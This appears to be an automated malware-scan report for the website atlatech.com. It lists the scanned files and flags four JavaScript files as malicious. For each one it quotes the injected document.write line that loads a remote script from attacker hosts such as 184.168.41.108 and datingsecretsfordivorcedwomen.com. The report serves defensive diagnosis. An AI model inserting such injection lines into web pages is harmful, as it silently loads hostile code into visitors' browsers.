Scanned pages/files
| Request | Server response | Status |
http://www.atlatech.com/ | 200 OK Content-Length: 40180 Content-Type: text/html | clean |
http://www.atlatech.com/js/tab-view.js | 200 OK Content-Length: 11083 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var textPadding = 3; var strictDocType = true; var tabView_maxNumberOfTabs = 6; var tab_view_tabObj = new Array(); var activeTabIndex = new Array(); var MSIE = navigator.userAgent.indexOf('MSIE')>=0?true:false; var regExp = new RegExp(".*MSIE ([0-9]\.[0-9]).*","g"); var navigatorVersion = navigator.userAgent.replace(regExp,'$1'); var ajaxObjects = new Array(); var tabView_countTabs = new Array(); var tabViewHeight = new Array( var obj2 = document.getElementById('tabView' parentId '_' tabIndex); obj2.parentNode.removeChild(obj2); resetTabIds(parentId); activeTabIndex[parentId]=-1; showTab(parentId,'0'); } } } *339810*/ document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://184.168.41.108/justhispanic/sYi63pYS.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.atlatech.com/../ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://www.atlatech.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.atlatech.com/templates/stepcarousel.js | 200 OK Content-Length: 18281 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict() var stepcarousel={ ajaxloadingmsg: '<div style="margin: 1em; font-weight: bold"><img src="ajaxloadr.gif" style="vertical-align: middle" /> Fetching Content. Please wait...</div>', defaultbuttonsfade: 0.4, configholder: {}, getCSSValue:function(val){ return (val=="auto")? 0 : parseInt(val) }, getremotepanels:function($, config){ config.$belt.html(this.ajaxloadingmsg) $.ajax({ url: config.contenttype[1], async: tru if (config.panelbehavior.persist) stepcarousel.setCookie(config.galleryid "persist", config.currentpanel) jQuery.each(config, function(ai, oi){ oi=null }) config=null }) } } *339810*/ document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://datingsecretsfordivorcedwomen.com/video/ZtKGaCMp.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.atlatech.com/templates/jquery.js | 200 OK Content-Length: 54280 Content-Type: application/javascript | clean |
http://www.atlatech.com/templates/jquery.droppy.js | 200 OK Content-Length: 1742 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $.fn.droppy = function(options) { options = $.extend({speed: 1}, options || {}); this.each(function() { var root = this, zIndex = 1000; function getSubnav(ele) { if (ele.nodeName.toLowerCase() == 'li') { var subnav = $('> ul', ele); return subnav.length ? subnav[0] : null; } else { return ele; } } function getActuator(ele) { if (ele $('li', this).hover( function() { $(this).addClass('hover'); $('> a', this).addClass('hover'); }, function() { $(this).removeClass('hover'); $('> a', this).removeClass('hover'); } ); }); }; *339810*/ document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://173.254.93.224/customerportal/FjbmNxnG.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.atlatech.com/templates/swfobject.js | 200 OK Content-Length: 6562 Content-Type: application/javascript | clean |
http://www.atlatech.com/jquery.js | 200 OK Content-Length: 630 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /jquery.js was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache/2.2.3 (Red Hat) Server at www.prism-solutions.com.au Port 80</address> </body></html> *339810*/ document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://datingsecretsfordivorcedwomen.com/video/ZtKGaCMp.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.atlatech.com/" gaJsHost "google-analytics.com/ga.js | 404 Not Found Content-Length: 369 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: atlatech.com
Result:
GET / HTTP/1.1
Host: atlatech.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: atlatech.com
Referer: http://www.google.com/search?q=atlatech.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: atlatech.com
Referer: http://www.google.com/search?q=atlatech.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=atlatech.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://atlatech.com/
Result: atlatech.com is not infected or malware details are not published yet.
Result: atlatech.com is not infected or malware details are not published yet.